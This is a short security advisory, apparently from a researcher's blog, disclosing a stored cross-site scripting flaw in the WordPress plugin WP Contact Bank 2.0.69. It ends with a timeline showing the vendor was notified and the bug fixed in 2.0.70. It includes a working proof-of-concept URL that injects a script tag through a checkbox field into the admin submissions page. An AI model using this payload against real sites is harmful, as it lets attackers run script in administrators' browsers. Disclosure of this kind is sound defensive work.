Kacper SzurekTagsPolishNewsletterAbout
YouTubeWebinaryFacebookTwitter
Kacper Szurek
TagsPolishNewsletterAboutYouTubeWebinaryFacebookTwitter
WP Contact Bank Standard Edition 2.0.69 XSS

05-11-2014 / Vulnerabilities

WP Contact Bank Standard Edition 2.0.69 XSS

Datas from checkboxes are not escaped and validated when added to database (_contact_bankfrontend-class.php lines 102-123).

If form has at least one checkbox field we can add XSS to it, which be visible for admin: wp-admin/admin.php?page=frontend_data

Proof of Concept

We assume that form has one checkbox, named 11111_chk and form ID=1

http://wordpress-instalation/wp-admin/admin-ajax.php?action=frontend_contact_form_library&param=frontend_submit_controls&form_id=1&11111_chk[]=%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E

Timeline

  • 14-10-2014: Discovered
  • 14-10-2014: Vendor notified
  • 14-10-2014: Version 2.0.70 released, issue resolved